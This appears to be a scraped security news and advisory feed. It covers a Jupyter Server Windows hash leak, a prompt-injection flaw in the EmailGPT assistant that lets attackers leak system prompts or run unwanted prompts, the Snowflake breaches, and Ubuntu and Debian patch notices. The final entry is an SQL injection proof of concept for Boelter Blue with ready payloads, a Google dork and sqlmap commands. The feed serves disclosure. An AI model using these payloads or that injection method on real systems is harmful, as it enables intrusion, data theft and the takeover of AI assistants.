### Summary

Jupyter Server on Windows has a vulnerability that lets unauthenticated attackers leak the NTLMv2 password hash of the Windows user running the Jupyter server. An attacker can crack this password to gain access to the Windows machine hosting the Jupyter server, or access other network-accessible machines or 3rd party services using that credential. Or an attacker perform an NTLM relay attack without cracking the credential to gain access to other network-accessible machines.



Skip to content

**Navigation Menu**

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   GitHub Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   *   Enterprise platform
        
        AI-powered developer platform
        
    
*   Pricing

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2024-35178

**Jupyter server on Windows discloses Windows user password hash**

**Package**

pip jupyter\_server (pip)

**Affected versions**

<= 2.14.0

**Description**

**Summary**

Jupyter Server on Windows has a vulnerability that lets unauthenticated attackers leak the NTLMv2 password hash of the Windows user running the Jupyter server. An attacker can crack this password to gain access to the Windows machine hosting the Jupyter server, or access other network-accessible machines or 3rd party services using that credential. Or an attacker perform an NTLM relay attack without cracking the credential to gain access to other network-accessible machines.

**References**

*   GHSA-hrw6-wg82-cm62
*   https://nvd.nist.gov/vuln/detail/CVE-2024-35178
*   jupyter-server/jupyter\_server@79fbf80

Published to the GitHub Advisory Database

Jun 6, 2024

GHSA-hrw6-wg82-cm62: Jupyter server on Windows discloses Windows user password hash

Synopsys warns of a new prompt injection hack involving a security vulnerability in EmailGPT, a popular AI email…

Synopsys warns of a new prompt injection hack involving a security vulnerability in EmailGPT, a popular AI email assistant. Learn how a security flaw in EmailGPT could allow hackers to steal your data or cause financial losses. Discover what you can do to protect yourself and why security is crucial in AI-powered tools.

A security vulnerability discovered by Synopsys’ Cybersecurity Research Center (CyRC) has exposed a potential pitfall for users of EmailGPT, a popular AI-powered email writing assistant and Google Chrome extension.

This vulnerability, tracked as CVE-2024-5184 and dubbed prompt injection, could allow malicious threat actors to manipulate the service and potentially compromise sensitive information.

****What is EmailGPT?****

EmailGPT leverages OpenAI’s GPT models to assist users in crafting emails within Gmail. Users can receive AI-generated suggestions for composing emails more efficiently by providing prompts and context. However, the recent discovery highlights a potential security flaw in this functionality.

****The Prompt Injection Threat****

EmailGPT uses an API service that allows a malicious user to inject a direct prompt and take over the service logic. Attackers can exploit this by forcing the AI service to leak standard system prompts or execute unwanted prompts.

When submitting a malicious prompt, the system provides the requested data, making it vulnerable to exploitation by anyone having access to the service. The vulnerability has a CVSS score of 6.5, indicating medium severity.

****Possible Dangers****

A malicious user could create a prompt that injects unintended functionality, potentially leading to data extraction, spam campaigns using compromised accounts, and generating misleading email content, contributing to disinformation campaigns. Apart from causing intellectual property leakage, this vulnerability can lead to denial-of-service, and financial loss when exploited. 

As per Synopsys’ blog post, researchers reached out to the developers of EmailGPT before publicizing the details, adhering to their responsible disclosure policy, but did not receive a response yet. Researchers recommend immediately removing EmailGPT from any installations as no workaround is currently available.

Users should stay informed about updates and patches to ensure continued secure use of the service. As AI technology continues to evolve, vigilance and robust security practices will be crucial to mitigate potential risks.

> _“The CyRC reached out to the developers but has not received a response within the 90-day timeline dictated by our responsible disclosure policy. The CyRC recommends removing the applications from networks immediately.”_
> 
> Synopsys

Patrick Harr, CEO at Pleasanton, Calif.- based SlashNext Email Security commented on the issue and emphasised the importance of strong governance and security measures for AI models to prevent vulnerabilities and exploits, stating that businesses should require proof of security from AI model suppliers before integrating them into their operations.

_“_This latest research by the Synopsys Cybersecurity Research Center further highlights the importance of strong governance on building, securing and red-teaming the AI models themselves. At its core, AI is code that can be exploited like any other code and the same processes need to be put in place to secure that code to prevent these unwanted prompt exploits,_“_ Patrik said. 

_“_Security and governance of the AI models are paramount as part of the culture and hygiene of companies building and proving the AI models either through applications or APIs. Customers particularly businesses need to demand proof of how the suppliers of these models are securing themselves including data access BEFORE they incorporate them into their business,_“_ he added.

****REALTED TOPICS** **

1.  New LLMjacking Attack Lets Hackers Hijack AI Models
2.  Flaws Exposed Hugging Face to AI Supply Chain Attacks
3.  AI Generated Fake Obituary Websites Target Grieving Users
4.  AI-Powered Scams, Human Trafficking Fuel Global Crime Surge
5.  ShadowRay Campaign Targets Ray AI Framework in Global Attack

New EmailGPT Flaw Puts User Data at Risk: Remove the Extension NOW

The number of alleged hacks targeting the customers of cloud storage firm Snowflake appears to be snowballing into one of the biggest data breaches of all time.

A hack against customers of the cloud storage company Snowflake looks like it may turn into one of the biggest-ever data breaches. Last week, Snowflake, which allows companies to store huge datasets on its servers, revealed that criminal hackers had been attempting to access its customers’ accounts using stolen login details. Data breaches targeting Ticketmaster and Santander have been linked to the attacks.

In the days since Snowflake first said a “limited number” of customer accounts had been accessed, however, cybercriminals have publicly claimed to be selling stolen data from two other major firms and alleged the information was taken from Snowflake accounts. At the same time, TechCrunch has reported that hundreds of Snowflake customer passwords have been found online and are accessible to cybercriminals.

Amid the claims, there remains uncertainty about the scope and scale of the attempted attack against Snowflake customers, who the attackers may be, and how an attack tool callously named “rapeflake” operates. It also highlights the growth in the use of infostealer malware in recent years and underscores the need for third-party software providers and companies to turn on multifactor authentication to reduce the chances of accounts being compromised.

**Snowballing**

A large proportion of the Snowflake drama has, so far, played out on the notorious cybercrime marketplace BreachForums. The FBI seized the forum in mid May, but another version quickly appeared, and its owners, hacker group ShinyHunters, claimed to be selling 560 million records from Ticketmaster and 30 million from Santander. Both companies have said they have suffered from data breaches, with Ticketmaster directly linking the incident to Snowflake while Santander said it had seen unauthorized access to one of its databases “hosted by a third-party provider.” Neither company has confirmed the size of the breaches.

In recent days, a BreachForums account going by the handle Sp1d3r has posted two more companies whose data it claims is related to the Snowflake incident: automotive giant Advance Auto Parts, which Sp1d3r claims to have 380 million customer details from, and financial services company LendingTree and subsidiary QuoteWizard, from which it claims to have data linked to 190 million people.

Some Advance Auto Parts staff and customer email addresses listed in sample data by the hacker appear to be legitimate accounts; emails WIRED sent to those addresses did not bounce nor were they otherwise rejected. BleepingComputer reports it has verified customer data from Advance Auto Parts.

“We are aware of reports that Advance may be involved in a security incident related to Snowflake,” Darryl Carr, a spokesperson from the company, tells WIRED. “We are investigating the matter and do not have further information to share at this time. We have not experienced any impact to our operations or systems.”

LendingTree has not responded to multiple requests from WIRED about the alleged breaches sent in the past few days. Neither LendingTree nor Advance Auto Parts has filed breach notifications with the Securities and Exchange Commission at the time of writing. Both companies have been listed by Snowflake as customers previously.

Since Snowflake acknowledged that accounts had been targeted, it has provided some more information about the incident. Brad Jones, Snowflake’s chief information security officer, said in a blog post that threat actors used login details to accounts that had been “purchased or obtained through infostealing malware,” which is designed to pull usernames and passwords from devices that have been compromised. The incident appears to be a “targeted campaign directed at users with single-factor authentication,” Jones added.

Jones’ post said Snowflake, alongside cybersecurity companies CrowdStrike and Mandiant, which it employed to investigate the incident, did not find evidence showing the attack was “caused by compromised credentials of current or former Snowflake personnel.” However, it has found one former employee's demo accounts were accessed, claiming they did not contain sensitive data.

When asked about potential breaches of specific companies’ data, a Snowflake person pointed to Jones’ statement: “We have not identified evidence suggesting this activity was caused by a vulnerability, misconfiguration, or breach of Snowflake’s platform.” The company did not provide an on-record comment clarifying what was meant by a “breach.” (Security company Hudson Rock said it removed a research post including various unverified claims about the Snowflake incident after receiving a legal letter from Snowflake).

The US Cybersecurity and Infrastructure Security Agency has issued an alert about the Snowflake incident, while Australia's Cyber Security Center said it is “aware of successful compromises of several companies utilizing Snowflake environments.”

**Unclear Origins**

Little is known about the Sp1d3r account advertising data on BreachForums, and it is not clear whether ShinyHunters obtained the data it was selling from another source or directly from victims’ Snowflake accounts—information about a Ticketmaster and Santander breach was originally posted on another cybercrime forum by a new user called SpidermanData.

The Sp1d3r account posted on BreachForums that the 2 terabytes of alleged LendingTree and QuoteWizard data was for sale for $2 million; while 3 TB of data allegedly from Advance Auto Parts would cost someone $1.5 million. “The price set by the threat actor appears extremely high for a typical listing posted to BreachForums,” says Chris Morgan, a senior cyber-threat intelligence analyst at security firm ReliaQuest.

Morgan says the legitimacy of Sp1d3r is not clear; however, he points out there is a nod to teenage hacking group Scattered Spider. “Interestingly, the threat actor's profile picture is taken from an article referencing the threat group Scattered Spider, although it is unclear whether this is to make an intentional association with the threat group.”

While the exact source of the alleged data breaches is unclear, the incident highlights how interconnected companies can be when relying on products and services from third-party providers. “I think a lot of this is just a recognition of how interdependent these services now are and how hard it is to control the security posture of third parties,” security researcher Tory Hunt told WIRED when the incidents first emerged.

As part of its response to the attacks, Snowflake has told all customers to make sure they enforce multifactor authentication on all accounts and allow traffic only from authorized users or locations. Companies that have been impacted should also reset their Snowflake login credentials. Enabling multifactor authentication vastly reduces the chances that online accounts will be compromised. As mentioned, TechCrunch reported this week that it has seen “hundreds of alleged Snowflake customer credentials'' taken by infostealing malware from computers of people who have accessed Snowflake accounts.

In recent years, coinciding with more people working from home since the Covid-19 pandemic, there has been a rise in the use of infostealer malware. “Infostealers have become more popular because they’re in high demand and pretty easy to create,” says Ian Gray, the vice president of intelligence at security company Flashpoint. Hackers have been seen to be copying or modifying existing infostealers and selling them on for as little as $10 for all the login details, cookies, files, and more from one infected device.

“This malware can be delivered in different ways and targets sensitive info like browser data (cookies and credentials), credit cards, and crypto wallets,” Gray says. “Hackers might comb through the logs for enterprise credentials to break into accounts without permission.”

The Snowflake Attack May Be Turning Into One of the Largest Data Breaches Ever

Ubuntu Security Notice 6814-1 - Xiantong Hou discovered that libvpx did not properly handle certain malformed media files. If an application using libvpx opened a specially crafted file, a remote attacker could cause a denial of service, or possibly execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-6814-1  
June 06, 2024

libvpx vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 24.04 LTS  
- Ubuntu 23.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

libvpx could be made to crash or run programs if it opened a specially  
crafted file.

Software Description:  
- libvpx: VP8 and VP9 video codec

Details:

Xiantong Hou discovered that libvpx did not properly handle certain  
malformed media files. If an application using libvpx opened a specially  
crafted file, a remote attacker could cause a denial of service, or  
possibly execute arbitrary code.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 24.04 LTS  
   libvpx9                         1.14.0-1ubuntu2.1

Ubuntu 23.10  
   libvpx7                         1.12.0-1ubuntu2.1

Ubuntu 22.04 LTS  
   libvpx7                         1.11.0-2ubuntu2.3

Ubuntu 20.04 LTS  
   libvpx6                         1.8.2-1ubuntu0.3

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6814-1  
   CVE-2024-5197

Package Information:  
   https://launchpad.net/ubuntu/+source/libvpx/1.14.0-1ubuntu2.1  
   https://launchpad.net/ubuntu/+source/libvpx/1.12.0-1ubuntu2.1  
   https://launchpad.net/ubuntu/+source/libvpx/1.11.0-2ubuntu2.3  
   https://launchpad.net/ubuntu/+source/libvpx/1.8.2-1ubuntu0.3

Ubuntu Security Notice USN-6814-1

Debian Linux Security Advisory 5706-1 - An integer overflow vulnerability in the rar e8 filter was discovered in libarchive, a multi-format archive and compression library, which may result in the execution of arbitrary code if a specially crafted RAR archive is processed.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5706-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoJune 05, 2024                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : libarchiveCVE ID         : CVE-2024-26256Debian Bug     : 1072107An integer overflow vulnerability in the rar e8 filter was discovered inlibarchive, a multi-format archive and compression library, which mayresult in the execution of arbitrary code if a specially crafted RARarchive is processed.For the stable distribution (bookworm), this problem has been fixed inversion 3.6.2-1+deb12u1.We recommend that you upgrade your libarchive packages.For the detailed security status of libarchive please refer to itssecurity tracker page at:https://security-tracker.debian.org/tracker/libarchiveFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmZgy+pfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0ScPRAAi2HFosqr3NeyDgV7gT3bTjKrq5EwrG9HIYS0e21KPfLteXxcsDjNkfzNnhSY0CoEL29/vyQpON+ht1En7utYtiLrSgDcjak4E26mBcMy2haL3hqMuGQiJTGkclBUQ4iHFU1SL6+KoNEgpNPIDBgDtbVDTNJUz66IUTl/QTjPvTsbUkSdSuXAvN9C9k5AEkSq4CIYl5UAQk4yJZ1MrU6pWdqPt6cpWULyaI5bIkC+fKdJ5T+2ElTnCT9VM/lkdePtI3V9iwj0vjEpelhmUlojjRUbbyuH+tDiCMUFj+GZueVvdZX1UuO4Je29vcNZ4VU6YvxU5gsgnQb09KnZd5EFGnqGNBnaEq+EEzW3Q4p2non4q6PUj8H0qzgNDMz8fxXuwdIh/8bVkmRNVQPJFurfLp5aU4ECQ4NROk3rg/sotyAjgQb6QeP2tcaxH0sKfgDc+SgcFgbUrGZ3CLanWiv19x7Oggt/I4DX/16GFSq3Z8xMzNlZOIotyr2TbKrIaPxwDrDyk8Qs2f6aPKOHZgiAIEOicpu3FP9Dr+oU9K/a8N2oDuz5Vwt4XOofN25GGZdhTTZtQ4uHBgEx1pmsWhpycdFSPUVHXW3pGoMNgIkOKau/oid73v224koBXe2eWygGE9Tnk9EDL9FtqYRbq+zTJGElcF7URbVRrxR5MVE8Ejs==BFbJ-----END PGP SIGNATURE-----

Debian Security Advisory 5706-1

Ubuntu Security Notice 6813-1 - It was discovered that the Hotspot component of OpenJDK 21 incorrectly handled certain exceptions with specially crafted long messages. An attacker could possibly use this issue to cause a denial of service. It was discovered that OpenJDK 21 incorrectly performed reverse DNS query under certain circumstances in the Networking/HTTP client component. An attacker could possibly use this issue to obtain sensitive information.

==========================================================================  
Ubuntu Security Notice USN-6813-1  
June 06, 2024

openjdk-21 vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in OpenJDK 21.

Software Description:  
- openjdk-21: Open Source Java implementation

Details:

It was discovered that the Hotspot component of OpenJDK 21 incorrectly  
handled certain exceptions with specially crafted long messages. An  
attacker could possibly use this issue to cause a denial of service.  
(CVE-2024-21011)

It was discovered that OpenJDK 21 incorrectly performed reverse DNS  
query under certain circumstances in the Networking/HTTP client  
component. An attacker could possibly use this issue to obtain sensitive  
information. (CVE-2024-21012)

Vladimir Kondratyev discovered that the Hotspot component of OpenJDK 21  
incorrectly handled address offset calculations in the C1 compiler. An  
attacker could possibly use this issue to cause a denial of service  
or execute arbitrary code. (CVE-2024-21068)

It was discovered that the Hotspot component of OpenJDK 21 incorrectly  
handled array accesses in the C2 compiler. An attacker could possibly use  
this issue to cause a denial of service or execute arbitrary code.  
(CVE-2024-21094)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.10  
   openjdk-21-jdk                  21.0.3+9-1ubuntu1~23.10.1  
   openjdk-21-jdk-headless         21.0.3+9-1ubuntu1~23.10.1  
   openjdk-21-jre                  21.0.3+9-1ubuntu1~23.10.1  
   openjdk-21-jre-headless         21.0.3+9-1ubuntu1~23.10.1  
   openjdk-21-jre-zero             21.0.3+9-1ubuntu1~23.10.1

Ubuntu 22.04 LTS  
   openjdk-21-jdk                  21.0.3+9-1ubuntu1~22.04.1  
   openjdk-21-jdk-headless         21.0.3+9-1ubuntu1~22.04.1  
   openjdk-21-jre                  21.0.3+9-1ubuntu1~22.04.1  
   openjdk-21-jre-headless         21.0.3+9-1ubuntu1~22.04.1  
   openjdk-21-jre-zero             21.0.3+9-1ubuntu1~22.04.1

Ubuntu 20.04 LTS  
   openjdk-21-jdk                  21.0.3+9-1ubuntu1~20.04.1  
   openjdk-21-jdk-headless         21.0.3+9-1ubuntu1~20.04.1  
   openjdk-21-jre                  21.0.3+9-1ubuntu1~20.04.1  
   openjdk-21-jre-headless         21.0.3+9-1ubuntu1~20.04.1  
   openjdk-21-jre-zero             21.0.3+9-1ubuntu1~20.04.1

This update uses a new upstream release, which includes additional bug  
fixes. After a standard system update you need to restart any Java  
applications to make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6813-1  
   CVE-2024-21011, CVE-2024-21012, CVE-2024-21068, CVE-2024-21094

Package Information:  
   https://launchpad.net/ubuntu/+source/openjdk-21/21.0.3+9-1ubuntu1~23.10.1  
   https://launchpad.net/ubuntu/+source/openjdk-21/21.0.3+9-1ubuntu1~22.04.1  
   https://launchpad.net/ubuntu/+source/openjdk-21/21.0.3+9-1ubuntu1~20.04.1

Ubuntu Security Notice USN-6813-1

OpenSSL is a robust, fully featured Open Source toolkit implementing the Secure Sockets Layer and Transport Layer Security protocols with full-strength cryptography world-wide.

OpenSSL Toolkit 3.3.1

OpenSSL Toolkit 3.2.2

OpenSSL Toolkit 3.1.6

Boelter Blue System Management version 1.3 suffers from a remote SQL injection vulnerability.

    Exploit Title: SQL Injection Vulnerability in Boelter Blue System Management (version 1.3)Google Dork: inurl:"Powered by Boelter Blue"Date: 2024-06-04Exploit Author: CBKB (DeadlyData, R4d1x)Vendor Homepage: https://www.boelterblue.comSoftware Link: https://play.google.com/store/apps/details?id=com.anchor5digital.anchor5adminapp&hl=en_USVersion: 1.3Tested on: Linux Debian 9 (stretch), Apache 2.4.25, MySQL >= 5.0.12CVE: CVE-2024-36840Vulnerability Details:Multiple SQL Injection vulnerabilities were discovered in Boelter Blue System Management (version 1.3). These vulnerabilities allow attackers to execute arbitrary SQL commands through the affected parameters. Successful exploitation can lead to unauthorized access, data leakage, and account takeovers.PoC:web server operating system: Linux Debian 9 (stretch)web application technology: Apache 2.4.25back-end DBMS: MySQL >= 5.0.12[22:21:39] [INFO] fetching database namesavailable databases [5]:[*] Anchor5Digital1. news_details.php?id parameter:Type: Boolean-based blindPayload: id=10071 AND 4036=4036Type: Time-based blindPayload: id=10071 AND (SELECT 4443 FROM (SELECT(SLEEP(5)))LjOd)Type: UNION queryPayload: id=-5819 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7170766b71,0x646655514b72686177544968656d6e414e4678595a666f77447a57515750476751524f5941496b55,0x7162626a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--Example SQLMap Command: sqlmap -u "https://www.example.com/news_details.php?id=10071" --random-agent --dbms=mysql --threads=4 --dbs2. services.php?section parameter:Type: Boolean-based blindPayload: section=(SELECT (CASE WHEN (1087=1087) THEN 5081 ELSE (SELECT 8711 UNION SELECT 5881) END))Type: Time-based blindPayload: section=5081 AND (SELECT 2101 FROM (SELECT(SLEEP(5)))nmcL)Example SQLMap Command: sqlmap -u "https://www.example.com/services.php?section=5081" --random-agent --tamper=space2comment --threads=8 --dbs3. location_details.php?id parameter:Type: Boolean-based blindPayload: id=836 AND 4036=4036Type: Time-based blindPayload: id=836 AND (SELECT 4443 FROM (SELECT(SLEEP(5)))LjOd)Type: UNION queryPayload: id=-5819 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7170766b71,0x646655514b72686177544968656d6e414e4678595a666f77447a57515750476751524f5941496b55,0x7162626a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--Example SQLMap Command: sqlmap -u "https://www.example.com/location_details.php?id=836" --random-agent --dbms=mysql --dbsImpact:Unauthorized access to the database.Extraction of sensitive information such as admin credentials, user email/passhash, device hashes, user PII, purchase history, and database credentials.Account takeovers and potential full control of the affected application.Discoverer(s)/Credits:CBKB (DeadlyData, R4d1x)References:https://infosec-db.github.io/CyberDepot/vuln_boelter_blue/https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-36840

Latest News